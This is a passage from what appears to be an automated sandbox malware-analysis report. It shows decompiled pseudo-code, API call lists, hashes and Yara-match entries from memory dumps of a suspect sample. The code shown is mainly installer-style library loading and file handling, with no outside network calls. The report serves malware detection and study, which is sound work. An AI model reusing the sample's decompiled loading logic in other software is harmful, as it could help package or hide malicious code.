                                                                            											}
                                                                            											goto L93;
                                                                            										case 0x22:
                                                                            											goto L57;
                                                                            									}
                                                                            								}
                                                                            								_t272 = _t269 - 1;
                                                                            								__eflags = _t272;
                                                                            								if(_t272 == 0) {
                                                                            									_v16 = _t283;
                                                                            									goto L80;
                                                                            								}
                                                                            								__eflags = _t272 != 1;
                                                                            								if(_t272 != 1) {
                                                                            									goto L162;
                                                                            								}
                                                                            								__eflags = _t286 - 0x6e;
                                                                            								if(__eflags > 0) {
                                                                            									_t309 = _t286 - 0x72;
                                                                            									__eflags = _t309;
                                                                            									if(_t309 == 0) {
                                                                            										_push(4);
                                                                            										L74:
                                                                            										_pop(_t274);
                                                                            										L75:
                                                                            										__eflags = _v8 - 1;
                                                                            										if(_v8 != 1) {
                                                                            											_t96 = _t332 + 0x1010;
                                                                            											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
                                                                            											__eflags =  *_t96;
                                                                            										} else {
                                                                            											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
                                                                            										}
                                                                            										_v8 = 1;
                                                                            										goto L57;
                                                                            									}
                                                                            									_t312 = _t309 - 1;
                                                                            									__eflags = _t312;
                                                                            									if(_t312 == 0) {
                                                                            										_push(0x10);
                                                                            										goto L74;
                                                                            									}
                                                                            									__eflags = _t312 != 0;
                                                                            									if(_t312 != 0) {
                                                                            										goto L57;
                                                                            									}
                                                                            									_push(0x40);
                                                                            									goto L74;
                                                                            								}
                                                                            								if(__eflags == 0) {
                                                                            									_push(8);
                                                                            									goto L74;
                                                                            								}
                                                                            								_t315 = _t286 - 0x21;
                                                                            								__eflags = _t315;
                                                                            								if(_t315 == 0) {
                                                                            									_v8 =  ~_v8;
                                                                            									goto L57;
                                                                            								}
                                                                            								_t316 = _t315 - 0x11;
                                                                            								__eflags = _t316;
                                                                            								if(_t316 == 0) {
                                                                            									_t274 = 0x100;
                                                                            									goto L75;
                                                                            								}
                                                                            								_t317 = _t316 - 0x31;
                                                                            								__eflags = _t317;
                                                                            								if(_t317 == 0) {
                                                                            									_t274 = 1;
                                                                            									goto L75;
                                                                            								}
                                                                            								__eflags = _t317 != 0;
                                                                            								if(_t317 != 0) {
                                                                            									goto L57;
                                                                            								}
                                                                            								_push(0x20);
                                                                            								goto L74;
                                                                            							} else {
                                                                            								_v32 = _t283;
                                                                            								_v36 = _t283;
                                                                            								goto L20;
                                                                            							}
                                                                            						}
                                                                            						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
                                                                            						if( *((short*)(_t321 - 2)) != 0x3a) {
                                                                            							goto L17;
                                                                            						}
                                                                            						__eflags = _v32 - _t283;
                                                                            						if(_v32 == _t283) {
                                                                            							goto L43;
                                                                            						}
                                                                            						goto L17;
                                                                            					}
                                                                            					_t277 = _t258 - 5;
                                                                            					if(_t277 == 0) {
                                                                            						__eflags = _v44 - _t283;
                                                                            						if(_v44 != _t283) {
                                                                            							goto L43;
                                                                            						} else {
                                                                            							__eflags = _v36 - 3;
                                                                            							_v32 = 1;
                                                                            							_v8 = _t283;
                                                                            							_v20 = _t283;
                                                                            							_v16 = (0 | _v36 == 0x00000003) + 1;
                                                                            							_v40 = _t283;
                                                                            							goto L20;
                                                                            						}
                                                                            					}
                                                                            					_t281 = _t277 - 1;
                                                                            					if(_t281 == 0) {
                                                                            						__eflags = _v44 - _t283;
                                                                            						if(_v44 != _t283) {
                                                                            							goto L43;
                                                                            						} else {
                                                                            							_v32 = 2;
                                                                            							_v8 = _t283;
                                                                            							_v20 = _t283;
                                                                            							goto L20;
                                                                            						}
                                                                            					}
                                                                            					if(_t281 != 0x16) {
                                                                            						goto L43;
                                                                            					} else {
                                                                            						_v32 = 3;
                                                                            						_v8 = 1;
                                                                            						goto L20;
                                                                            					}
                                                                            				}
                                                                            				GlobalFree(_v56);
                                                                            				GlobalFree(_v24);
                                                                            				GlobalFree(_v48);
                                                                            				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
                                                                            					L182:
                                                                            					return _t332;
                                                                            				} else {
                                                                            					_t225 =  *_t332 - 1;
                                                                            					if(_t225 == 0) {
                                                                            						_t187 = _t332 + 8; // 0x8
                                                                            						_t324 = _t187;
                                                                            						__eflags =  *_t324 - _t283;
                                                                            						if( *_t324 != _t283) {
                                                                            							_t226 = GetModuleHandleW(_t324);
                                                                            							__eflags = _t226 - _t283;
                                                                            							 *(_t332 + 0x1008) = _t226;
                                                                            							if(_t226 != _t283) {
                                                                            								L171:
                                                                            								_t192 = _t332 + 0x808; // 0x808
                                                                            								_t325 = _t192;
                                                                            								_t227 = E713C16BD( *(_t332 + 0x1008), _t325);
                                                                            								__eflags = _t227 - _t283;
                                                                            								 *(_t332 + 0x100c) = _t227;
                                                                            								if(_t227 == _t283) {
                                                                            									__eflags =  *_t325 - 0x23;
                                                                            									if( *_t325 == 0x23) {
                                                                            										_t195 = _t332 + 0x80a; // 0x80a
                                                                            										_t231 = E713C13B1(_t195);
                                                                            										__eflags = _t231 - _t283;
                                                                            										if(_t231 != _t283) {
                                                                            											__eflags = _t231 & 0xffff0000;
                                                                            											if((_t231 & 0xffff0000) == 0) {
                                                                            												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
                                                                            											}
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            								__eflags = _v52 - _t283;
                                                                            								if(_v52 != _t283) {
                                                                            									L178:
                                                                            									_t325[lstrlenW(_t325)] = 0x57;
                                                                            									_t229 = E713C16BD( *(_t332 + 0x1008), _t325);
                                                                            									__eflags = _t229 - _t283;
                                                                            									if(_t229 != _t283) {
                                                                            										L166:
                                                                            										 *(_t332 + 0x100c) = _t229;
                                                                            										goto L182;
                                                                            									}
                                                                            									__eflags =  *(_t332 + 0x100c) - _t283;
                                                                            									L180:
                                                                            									if(__eflags != 0) {
                                                                            										goto L182;
                                                                            									}
                                                                            									L181:
                                                                            									_t206 = _t332 + 4;
                                                                            									 *_t206 =  *(_t332 + 4) | 0xffffffff;
                                                                            									__eflags =  *_t206;
                                                                            									goto L182;
                                                                            								} else {
                                                                            									__eflags =  *(_t332 + 0x100c) - _t283;
                                                                            									if( *(_t332 + 0x100c) != _t283) {
                                                                            										goto L182;
                                                                            									}
                                                                            									goto L178;
                                                                            								}
                                                                            							}
                                                                            							_t234 = LoadLibraryW(_t324);
                                                                            							__eflags = _t234 - _t283;
                                                                            							 *(_t332 + 0x1008) = _t234;
                                                                            							if(_t234 == _t283) {
                                                                            								goto L181;
                                                                            							}
                                                                            							goto L171;
                                                                            						}
                                                                            						_t188 = _t332 + 0x808; // 0x808
                                                                            						_t236 = E713C13B1(_t188);
                                                                            						 *(_t332 + 0x100c) = _t236;
                                                                            						__eflags = _t236 - _t283;
                                                                            						goto L180;
                                                                            					}
                                                                            					_t237 = _t225 - 1;
                                                                            					if(_t237 == 0) {
                                                                            						_t185 = _t332 + 0x808; // 0x808
                                                                            						_t238 = _t185;
                                                                            						__eflags =  *_t238 - _t283;
                                                                            						if( *_t238 == _t283) {
                                                                            							goto L182;
                                                                            						}
                                                                            						_t229 = E713C13B1(_t238);
                                                                            						L165:
                                                                            						goto L166;
                                                                            					}
                                                                            					if(_t237 != 1) {
                                                                            						goto L182;
                                                                            					}
                                                                            					_t81 = _t332 + 8; // 0x8
                                                                            					_t284 = _t81;
                                                                            					_t326 = E713C13B1(_t81);
                                                                            					 *(_t332 + 0x1008) = _t326;
                                                                            					if(_t326 == 0) {
                                                                            						goto L181;
                                                                            					}
                                                                            					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
                                                                            					 *((intOrPtr*)(_t332 + 0x1050)) = E713C12CC(_t284);
                                                                            					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
                                                                            					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
                                                                            					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
                                                                            					_t90 = _t332 + 0x808; // 0x808
                                                                            					_t229 =  *(_t326->i + E713C13B1(_t90) * 4);
                                                                            					goto L165;
                                                                            				}
                                                                            			}

































































                                                                            0x00000000
                                                                            0x713c1e5a
                                                                            0x713c21d0
                                                                            0x713c21d3
                                                                            0x713c21da
                                                                            0x713c21da
                                                                            0x713c21dd
                                                                            0x713c21e1
                                                                            0x713c21f5
                                                                            0x713c21f5
                                                                            0x713c21f8
                                                                            0x713c21fc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c21fe
                                                                            0x713c2202
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c2204
                                                                            0x713c220b
                                                                            0x713c220b
                                                                            0x713c2211
                                                                            0x713c2214
                                                                            0x713c2230
                                                                            0x713c2216
                                                                            0x713c221f
                                                                            0x713c2222
                                                                            0x713c2222
                                                                            0x00000000
                                                                            0x713c2214
                                                                            0x713c21e3
                                                                            0x713c21e6
                                                                            0x713c21ea
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c21ec
                                                                            0x00000000
                                                                            0x713c21ec
                                                                            0x713c21d5
                                                                            0x713c21d8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c21d8
                                                                            0x713c1dfe
                                                                            0x713c1dfe
                                                                            0x713c1dff
                                                                            0x713c1f49
                                                                            0x713c1f49
                                                                            0x713c1f50
                                                                            0x713c1f53
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1f60
                                                                            0x00000000
                                                                            0x713c214b
                                                                            0x713c214e
                                                                            0x713c2151
                                                                            0x713c2151
                                                                            0x713c2152
                                                                            0x713c2153
                                                                            0x713c2156
                                                                            0x713c2159
                                                                            0x713c215c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c215e
                                                                            0x713c215e
                                                                            0x713c2162
                                                                            0x713c217a
                                                                            0x713c217d
                                                                            0x713c2181
                                                                            0x713c2187
                                                                            0x00000000
                                                                            0x713c2187
                                                                            0x713c2164
                                                                            0x713c2164
                                                                            0x713c2167
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c2169
                                                                            0x713c216c
                                                                            0x713c216e
                                                                            0x713c216f
                                                                            0x713c216f
                                                                            0x713c216f
                                                                            0x713c2170
                                                                            0x713c2173
                                                                            0x713c2176
                                                                            0x713c2177
                                                                            0x713c2151
                                                                            0x713c2152
                                                                            0x713c2153
                                                                            0x713c2156
                                                                            0x713c2159
                                                                            0x713c215c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c215c
                                                                            0x00000000
                                                                            0x713c1fa7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1fb3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1f9a
                                                                            0x713c1f9e
                                                                            0x713c1fa2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c211c
                                                                            0x713c2120
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c2126
                                                                            0x713c212f
                                                                            0x713c2136
                                                                            0x713c213e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c2083
                                                                            0x713c2083
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1fbc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c21a6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c208b
                                                                            0x713c208d
                                                                            0x713c208d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c2196
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c219a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c21a2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20d3
                                                                            0x713c20d5
                                                                            0x713c20d5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c209d
                                                                            0x713c209f
                                                                            0x713c209f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20af
                                                                            0x713c20b1
                                                                            0x713c20b1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20e1
                                                                            0x713c20e3
                                                                            0x713c20e3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20ba
                                                                            0x713c20bc
                                                                            0x713c20bc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20c1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c219e
                                                                            0x713c21a8
                                                                            0x713c21a8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20ec
                                                                            0x713c20f0
                                                                            0x713c20f5
                                                                            0x713c20f8
                                                                            0x713c20f9
                                                                            0x713c20fc
                                                                            0x713c2102
                                                                            0x713c2102
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c218e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20c5
                                                                            0x713c20c7
                                                                            0x713c20c7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1fc3
                                                                            0x713c1fc3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20da
                                                                            0x713c20dc
                                                                            0x713c20dc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1f67
                                                                            0x713c1f6d
                                                                            0x713c1f70
                                                                            0x713c1f72
                                                                            0x713c1f72
                                                                            0x713c1f75
                                                                            0x713c1f79
                                                                            0x713c1f86
                                                                            0x713c1f88
                                                                            0x713c1f8e
                                                                            0x713c1f8e
                                                                            0x713c1f8e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c208e
                                                                            0x713c208e
                                                                            0x713c2090
                                                                            0x713c2097
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20d6
                                                                            0x713c20d6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20a0
                                                                            0x713c20a0
                                                                            0x713c20a2
                                                                            0x713c20a9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20b2
                                                                            0x713c20b2
                                                                            0x713c20b4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20e4
                                                                            0x713c20e4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20bd
                                                                            0x713c20bd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c210a
                                                                            0x713c210e
                                                                            0x713c2113
                                                                            0x713c2116
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20c8
                                                                            0x713c20c8
                                                                            0x713c20cb
                                                                            0x713c20cd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c20dd
                                                                            0x713c20dd
                                                                            0x713c20e6
                                                                            0x713c20e6
                                                                            0x713c1fc5
                                                                            0x713c1fc5
                                                                            0x713c1fc8
                                                                            0x713c1fcf
                                                                            0x713c1fd1
                                                                            0x713c1fd3
                                                                            0x713c1fda
                                                                            0x713c1fdd
                                                                            0x713c1fe2
                                                                            0x713c1fe4
                                                                            0x713c1fe6
                                                                            0x713c1fea
                                                                            0x713c1ff0
                                                                            0x713c1ff6
                                                                            0x713c1ff6
                                                                            0x713c1ff8
                                                                            0x713c1ff8
                                                                            0x713c1ff9
                                                                            0x713c1ff9
                                                                            0x713c1ffd
                                                                            0x713c2003
                                                                            0x713c2005
                                                                            0x713c2009
                                                                            0x713c200e
                                                                            0x713c200e
                                                                            0x713c2010
                                                                            0x713c2010
                                                                            0x713c2013
                                                                            0x713c2016
                                                                            0x713c201f
                                                                            0x713c2025
                                                                            0x713c2028
                                                                            0x713c2028
                                                                            0x713c202a
                                                                            0x713c202d
                                                                            0x713c2033
                                                                            0x713c2039
                                                                            0x713c2039
                                                                            0x713c203b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c2041
                                                                            0x713c2041
                                                                            0x713c2045
                                                                            0x713c204c
                                                                            0x713c2070
                                                                            0x713c2070
                                                                            0x713c2074
                                                                            0x713c2076
                                                                            0x713c2079
                                                                            0x713c2079
                                                                            0x713c207c
                                                                            0x713c207c
                                                                            0x00000000
                                                                            0x713c2074
                                                                            0x713c2051
                                                                            0x713c2054

                                                                            APIs
                                                                              • Part of subcall function 713C12BB: GlobalAlloc.KERNEL32(00000040,?,713C12DB,?,713C137F,00000019,713C11CA,-000000A0), ref: 713C12C5
                                                                            • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 713C1D2D
                                                                            • lstrcpyW.KERNEL32(00000008,?), ref: 713C1D75
                                                                            • lstrcpyW.KERNEL32(00000808,?), ref: 713C1D7F
                                                                            • GlobalFree.KERNEL32(00000000), ref: 713C1D92
                                                                            • GlobalFree.KERNEL32(?), ref: 713C1E74
                                                                            • GlobalFree.KERNEL32(?), ref: 713C1E79
                                                                            • GlobalFree.KERNEL32(?), ref: 713C1E7E
                                                                            • GlobalFree.KERNEL32(00000000), ref: 713C2068
                                                                            • lstrcpyW.KERNEL32(?,?), ref: 713C2222
                                                                            • GetModuleHandleW.KERNEL32(00000008), ref: 713C22A1
                                                                            • LoadLibraryW.KERNEL32(00000008), ref: 713C22B2
                                                                            • GetProcAddress.KERNEL32(?,?), ref: 713C230C
                                                                            • lstrlenW.KERNEL32(00000808), ref: 713C2326
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206470499574.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
                                                                            • Associated: 00000002.00000002.206470427248.00000000713C0000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000002.00000002.206470593147.00000000713C4000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000002.00000002.206470665891.00000000713C6000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_713c0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                            • String ID:
                                                                            • API String ID: 245916457-0
                                                                            • Opcode ID: 5a14d3550815f832db113a28f9b1c4a2c0c460955dea0377756dc883eb06d4b8
                                                                            • Instruction ID: 090ec0b801579ac9f6f9f2ad213c861905471b5d8d27991e53b56fc10688fc97
                                                                            • Opcode Fuzzy Hash: 5a14d3550815f832db113a28f9b1c4a2c0c460955dea0377756dc883eb06d4b8
                                                                            • Instruction Fuzzy Hash: 15229C71D0420ADEDB12DFA8C984AEEBBB9FB04B19F10452ED166E22C4D770DD85EB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 67%
                                                                            			E004021AA(void* __eflags) {
                                                                            				signed int _t52;
                                                                            				void* _t56;
                                                                            				intOrPtr* _t60;
                                                                            				intOrPtr _t61;
                                                                            				intOrPtr* _t62;
                                                                            				intOrPtr* _t64;
                                                                            				intOrPtr* _t66;
                                                                            				intOrPtr* _t68;
                                                                            				intOrPtr* _t70;
                                                                            				intOrPtr* _t72;
                                                                            				intOrPtr* _t74;
                                                                            				intOrPtr* _t76;
                                                                            				intOrPtr* _t78;
                                                                            				intOrPtr* _t80;
                                                                            				void* _t83;
                                                                            				intOrPtr* _t91;
                                                                            				signed int _t101;
                                                                            				signed int _t105;
                                                                            				void* _t107;
                                                                            
                                                                            				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                                            				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                                            				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                                            				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                                            				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                                            				_t52 =  *(_t107 - 0x20);
                                                                            				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                                            				_t101 = _t52 & 0x00008000;
                                                                            				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                                            				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                                            				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                                            					E00402DA6(0x21);
                                                                            				}
                                                                            				_t56 = _t107 + 8;
                                                                            				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
                                                                            				if(_t56 < _t83) {
                                                                            					L14:
                                                                            					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                                            					_push(0xfffffff0);
                                                                            				} else {
                                                                            					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                                            					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
                                                                            					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                                            					if(_t61 >= _t83) {
                                                                            						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                                            						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                                            						if(_t101 == _t83) {
                                                                            							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                                            							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Temp");
                                                                            						}
                                                                            						if(_t105 != _t83) {
                                                                            							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                                            							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                                            						}
                                                                            						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                                            						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                                            						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                                            						if( *_t91 != _t83) {
                                                                            							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                                            							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                                            						}
                                                                            						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                                            						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                                            						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                                            						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                                            						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                            							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                                            							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                                            						}
                                                                            						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                                            						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                            					}
                                                                            					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                                            					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                            					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                            						_push(0xfffffff4);
                                                                            					} else {
                                                                            						goto L14;
                                                                            					}
                                                                            				}
                                                                            				E00401423();
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
                                                                            				return 0;
                                                                            			}























                                                                            APIs
                                                                            • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInstance
                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                            • API String ID: 542301482-670666241
                                                                            • Opcode ID: c4fc3fa67b876c583326420a1baafc892d445f4eb77b454d3c92970a980d6818
                                                                            • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                                                            • Opcode Fuzzy Hash: c4fc3fa67b876c583326420a1baafc892d445f4eb77b454d3c92970a980d6818
                                                                            • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryLoadMemoryProtectVirtual
                                                                            • String ID: ,oQ_
                                                                            • API String ID: 3389902171-3495912439
                                                                            • Opcode ID: cd04949fb238fde32bce57ffecfb5dafd803ec9c85407875bfd3d0fffe380201
                                                                            • Instruction ID: c5b718720a444646865ed57402796bf910d661e980ffed224d537794678ea64a
                                                                            • Opcode Fuzzy Hash: cd04949fb238fde32bce57ffecfb5dafd803ec9c85407875bfd3d0fffe380201
                                                                            • Instruction Fuzzy Hash: 18423A319083858FDB32CF38C9987DABBA2AF16354F49869ECC994F197D7318545C722
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 39%
                                                                            			E0040290B(short __ebx, short* __edi) {
                                                                            				void* _t21;
                                                                            
                                                                            				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                                                            					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                                            					_push(_t21 - 0x2b0);
                                                                            					_push(__edi);
                                                                            					E0040653D();
                                                                            				} else {
                                                                            					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                                            					 *__edi = __ebx;
                                                                            					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
                                                                            				return 0;
                                                                            			}





                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID:
                                                                            • API String ID: 1974802433-0
                                                                            • Opcode ID: db3e0d9fc2be9d26385cb54e60570df6e1e2b9abacb98404d6fb5f3e13457c69
                                                                            • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                                                            • Opcode Fuzzy Hash: db3e0d9fc2be9d26385cb54e60570df6e1e2b9abacb98404d6fb5f3e13457c69
                                                                            • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: cVOe
                                                                            • API String ID: 0-719262702
                                                                            • Opcode ID: 876f3ca5c79b0974cc56d30b47101a55e2e5c5a58a67aa35ebf6978a26d55005
                                                                            • Instruction ID: 3943170b7a3e1936357336fd2659ecde42d3917333bfb7d9f2be092c7b5c8532
                                                                            • Opcode Fuzzy Hash: 876f3ca5c79b0974cc56d30b47101a55e2e5c5a58a67aa35ebf6978a26d55005
                                                                            • Instruction Fuzzy Hash: 5341E234604305CFDB3A9F24C5F9BEA77ABEF55264F45816ECC8A4B152CB798485CA02
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
